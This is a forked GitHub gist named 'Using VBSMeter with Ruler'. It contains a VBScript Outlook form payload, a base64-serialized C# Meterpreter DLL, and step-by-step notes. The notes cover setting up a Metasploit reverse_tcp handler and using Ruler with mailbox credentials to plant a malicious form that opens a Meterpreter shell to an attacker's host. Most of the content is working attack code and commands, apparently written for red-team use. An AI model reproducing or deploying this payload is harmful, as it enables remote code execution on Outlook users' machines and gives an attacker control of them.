Skip to content

Instantly share code, notes, and snippets.

@leoloobeek

leoloobeek/Command.vbs

Forked from staaldraad/Command.vbs
Created November 6, 2017 23:14
Show Gist options
  • Save leoloobeek/ebfa368ebeb6982b3a37dcf0dffd1c6d to your computer and use it in GitHub Desktop.
Save leoloobeek/ebfa368ebeb6982b3a37dcf0dffd1c6d to your computer and use it in GitHub Desktop.
Download ZIP
Using VBSMeter with Ruler
Raw
Command.vbs
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
Set ms = CreateObject("System.IO.MemoryStream")
ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
ms.Position = 0
Set Base64ToStream = ms
End Function
Sub Pew
Dim s, entry_class
s = Trim(Item.Body)
entry_class = "MeterPreter"
Dim fmt, al, d, o
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
al.Add fmt.SurrogateSelector
Set d = fmt.Deserialize_2(Base64ToStream(s))
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.MSFConnect RHOST, RPORT
End Sub
Function X()
Pew
Raw
Payload.b64
AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0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BagAKQG2Aq4AKQGoBrQAkQCMBAYAJwB7AHECLgALAMoBLgATANMBLgAbAPIBLgAjAPsBLgArABYCLgAzABYCLgA7ABYCLgBDAPsBLgBLABwCLgBTABYCLgBbABYCLgBjADQCLgBrAF4CQwBbAGsCCgBmAQwAagEIAAYAxgAgAE8DRANaAwEAjQBiEQMAOQQBAAABBQAoBAIARAEHAEYGAQBAAQkAGwYBAAABCwCHBgEARAENAFAGAQAAAQ8ArQYDAAABEQBGAAQAAAETAF4ABAAAARUABwYEAASAAAABAAAAAAAAAAAAAAAAABMAAAACAAAAAAAAAAAAAAC9AD0AAAAAAAIAAAAAAAAAAAAAAL0AgQMAAAAAAwACAAAAAAAAa2VybmVsMzIAPE1vZHVsZT4AQ1NoYXJwLU1ldGVycHJldGVyRExMAGdRT1MAc1FPUwBscFdTQURhdGEAbXNjb3JsaWIAVmlydHVhbEFsbG9jAGxwVGhyZWFkSWQAQ3JlYXRlVGhyZWFkAHdWZXJzaW9uUmVxdWVzdGVkAEluaXRpYWxpemVkAEdldEZpZWxkAERlbWFuZABSdW50aW1lVHlwZUhhbmRsZQBoSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAHNvY2tldEhhbmRsZQBWYWx1ZVR5cGUAUHJvdG9jb2xUeXBlAHByb3RvY29sVHlwZQBmbEFsbG9jYXRpb25UeXBlAFNvY2tldFR5cGUAc29ja2V0VHlwZQBUcmFuc3BvcnRUeXBlAFRyeVBhcnNlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFNlY3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAUmVhZEJ5dGUAR2V0VmFsdWUAZ2V0X1NpemUAZHdTdGFja1NpemUAc29ja2V0QWRkcmVzc1NpemUAZHdTaXplAFNlcmlhbGl6ZQBpTWF4VWRwRGcAVG9TdHJpbmcAaXBTdHJpbmcAbGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAFdzMl8zMi5kbGwAd3MyXzMyLmRsbABrZXJuZWwzMi5kbGwAQ1NoYXJwLU1ldGVycHJldGVyRExMLmRsbABTeXN0ZW0Ad0hpZ2hWZXJzaW9uAENvZGVBY2Nlc3NQZXJtaXNzaW9uAFNvY2tldFBlcm1pc3Npb24ARGVzdGluYXRpb24AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24Ac3pEZXNjcmlwdGlvbgB3VmVzdGlvbgBGaWVsZEluZm8AcHJvdG9jb2xJbmZvAGxwVmVuZG9ySW5mbwBaZXJvAFdTQUNsZWFudXAAZ3JvdXAAV1NBU3RhcnR1cABtX0J1ZmZlcgBpbkJ1ZmZlcgBvdXRCdWZmZXIAYnVmZmVyAGxwUGFyYW1ldGVyAE1ldGVyUHJldGVyAEJpdENvbnZlcnRlcgAuY3RvcgBSZWFkSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBscFRocmVhZEF0dHJpYnV0ZXMAR2V0Qnl0ZXMAQmluZGluZ0ZsYWdzAGR3Q3JlYXRpb25GbGFncwBTb2NrZXRGbGFncwBzb2NrZXRGbGFncwBmbGFncwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMATmV0d29ya0FjY2VzcwBJUEFkZHJlc3MAZ2V0X0FkZHJlc3MAbHBBZGRyZXNzAFNvY2tldEFkZHJlc3MAc29ja2V0QWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBTeXN0ZW0uTmV0LlNvY2tl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
Raw
Steps.md

This requires Ruler

The original payload, VBSMeter was created by @Cn33liz and can be found here: VBSMeter. The version here is slightly slimmed down and modified so that it fits into the maximum payload size for Ruler forms.

The "payload" has been split into a seperate file, this allows us to send it as the message body of an email, and have the form invoke it dynamically.

Setup MSF

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 0.0.0.0
set LPORT 443
set AutoRunScript post/windows/manage/migrate NAME=notepad.exe
set EnableUnicodeEncoding true
set EnableStageEncoding true
set ExitOnSession false
set EXITFUNC thread
exploit -j

Remember to set EXITFUNC, if you leave it as process Outlook will crash/exit.

Shell through Ruler

  1. Create Command.vbs and Payload.b64.
  2. cat /tmp/Payload.b64|xargs -0 -I{} ./ruler-linux64 --email [email protected] --password "ThePassword" form add --suffix metpew --input /tmp/Command.vbs --send --body "{}" --rule
  3. You should receive a shell

You'll note that command.vbs has a bit of a weird syntax.

Call X()
End Function

^ this closes the Function P(), which exists in the defualt forms template.

Function X()
Pew

^ this calls our sub to spawn the shell. There is NO End Function needed as the default forms template inserts this automatically.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment